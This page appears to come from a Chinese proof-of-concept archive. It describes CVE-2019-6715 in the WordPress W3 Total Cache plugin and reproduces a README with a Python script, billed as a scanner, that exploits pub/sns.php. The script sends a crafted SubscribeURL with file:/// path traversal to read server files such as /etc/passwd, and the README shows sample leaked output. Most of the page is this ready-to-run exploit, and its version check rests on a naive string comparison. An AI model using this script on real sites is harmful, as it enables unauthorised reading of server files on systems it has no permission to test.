关联漏洞
标题:
WordPress W3 Total Cache插件信息泄露漏洞
(CVE-2019-6715)
描述:WordPress是WordPress基金会的一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。W3 Total Cache plugin是使用在其中的一个SEO(搜索引擎优化)插件。 WordPress W3 Total Cache插件0.9.4之前版本中的pub/sns.php文件存在信息泄露漏洞。该漏洞源于网络系统或产品在运行过程中存在配置等错误。未授权的攻击者可利用漏洞获取受影响组件敏感信息。
描述
Testing for CVE-2019-6715 (Arbitrary File Read)/ CVE-2024-12365 (SSRF/Info Disclosure)
介绍
# W3TotalChache
Testing for CVE-2019-6715 (Arbitrary File Read)/ CVE-2024-12365 (SSRF/Info Disclosure)
usage:
python3 w3tc_scanner.py -u https://example.com -f /etc/passwd -d 3
import requests
import argparse
from urllib.parse import urlparse
def check_w3tc_version(url):
try:
response = requests.get(url, timeout=10)
headers = response.headers
# Check X-Powered-By header
if 'X-Powered-By' in headers and 'W3 Total Cache' in headers['X-Powered-By']:
version = headers['X-Powered-By'].split('/')[-1]
return version
# Check HTML content for version
if 'W3 Total Cache' in response.text:
version = response.text.split('W3 Total Cache/')[-1].split()[0][:5]
return version
return None
except Exception as e:
print(f"Version check error: {str(e)}")
return None
def test_file_read(target_url, file_path="/etc/passwd", depth=2):
try:
parsed = urlparse(target_url)
base_url = f"{parsed.scheme}://{parsed.netloc}"
traversal = '../' * depth
exploit_url = f"{base_url}/wp-content/plugins/w3-total-cache/pub/sns.php"
payload = {
"Type": "SubscriptionConfirmation",
"Message": "",
"SubscribeURL": f"file:///{traversal}{file_path}"
}
headers = {'Content-Type': 'application/json'}
response = requests.put(exploit_url, json=payload, headers=headers, timeout=15)
if response.status_code == 200 and len(response.text) > 0:
return True, response.text
return False, None
except Exception as e:
print(f"File read test error: {str(e)}")
return False, None
def main():
parser = argparse.ArgumentParser(description='W3 Total Cache Vulnerability Scanner')
parser.add_argument('-u', '--url', required=True, help='Target URL')
parser.add_argument('-f', '--file', default="/etc/passwd",
help='File to read (default: /etc/passwd)')
parser.add_argument('-d', '--depth', type=int, default=2,
help='Traversal depth (default: 2)')
args = parser.parse_args()
print(f"[*] Scanning {args.url}")
# Version check
version = check_w3tc_version(args.url)
if version:
print(f"[!] Detected W3 Total Cache version: {version}")
if version <= "2.8.1":
print("[!] Vulnerable to CVE-2024-12365 (SSRF/Info Disclosure)")
else:
print("[!] W3 Total Cache not detected through headers/content")
# File read vulnerability test
print("\n[*] Testing for CVE-2019-6715 (Arbitrary File Read)...")
vulnerable, content = test_file_read(args.url, args.file, args.depth)
if vulnerable:
print(f"[!] Vulnerable to directory traversal!\nFile content:\n{content[:500]}...")
else:
print("[+] No immediate file read vulnerability detected")
if __name__ == "__main__":
main()
Output:
[*] Scanning https://example.com
[!] Detected W3 Total Cache version: 2.8.0
[!] Vulnerable to CVE-2024-12365 (SSRF/Info Disclosure)
[*] Testing for CVE-2019-6715 (Arbitrary File Read)...
[!] Vulnerable to directory traversal!
File content:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
文件快照
[4.0K] /data/pocs/ae3c83766694035892dc3492cc321754aa438c40
└── [3.3K] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。